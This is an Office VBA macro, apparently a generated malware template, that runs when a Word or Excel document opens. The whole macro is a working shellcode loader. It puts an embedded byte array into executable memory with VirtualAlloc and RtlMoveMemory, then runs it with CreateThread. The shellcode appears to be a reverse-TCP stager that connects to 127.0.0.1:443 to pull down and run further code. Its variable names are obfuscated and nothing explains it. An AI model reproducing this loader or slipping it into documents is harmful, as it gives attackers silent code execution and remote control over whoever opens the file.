#If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Tocbe As Long, ByVal Kofs As Long, ByVal Wznxmsk As LongPtr, Sjfw As Long, ByVal Yzyq As Long, Swupnry As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Ibepkf As Long, ByVal Pngvf As Long, ByVal Qvnrfjror As Long, ByVal Jno As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Gprebxh As LongPtr, ByRef Mvvnmgib As Any, ByVal Dvy As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Tocbe As Long, ByVal Kofs As Long, ByVal Wznxmsk As Long, Sjfw As Long, ByVal Yzyq As Long, Swupnry As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Ibepkf As Long, ByVal Pngvf As Long, ByVal Qvnrfjror As Long, ByVal Jno As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Gprebxh As Long, ByRef Mvvnmgib As Any, ByVal Dvy As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Unkng As Long, Lqptaqj As Variant, Hwcmsd As Long
#If Vba7 Then
        Dim  Qifne As LongPtr, Vqcgvxct As LongPtr
#Else
        Dim  Qifne As Long, Vqcgvxct As Long
#EndIf
        Lqptaqj = Array(252,232,143,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20,49,255,15,183,74,38,139,114,40,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,139,82,16,87,139,66,60,1,208,139,64,120,133,192,116,76,1,208,139,72,24,139,88,32,80,1,211,133,201,116,60,73,49, _
255,139,52,139,1,214,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,51,50,0,0,104,119,115,50,95,84, _
104,76,119,38,7,137,232,255,208,184,144,1,0,0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,127,0,0,1,104,2,0,1,187,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0, _
106,0,106,4,86,87,104,2,217,200,95,255,213,131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213, _
94,94,255,12,36,15,133,112,255,255,255,233,155,255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)

        Qifne = VirtualAlloc(0, UBound(Lqptaqj), &H1000, &H40)
        For Hwcmsd = LBound(Lqptaqj) To UBound(Lqptaqj)
                Unkng = Lqptaqj(Hwcmsd)
                Vqcgvxct = RtlMoveMemory(Qifne + Hwcmsd, Unkng, 1)
        Next Hwcmsd
        Vqcgvxct = CreateThread(0, 0, Qifne, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub
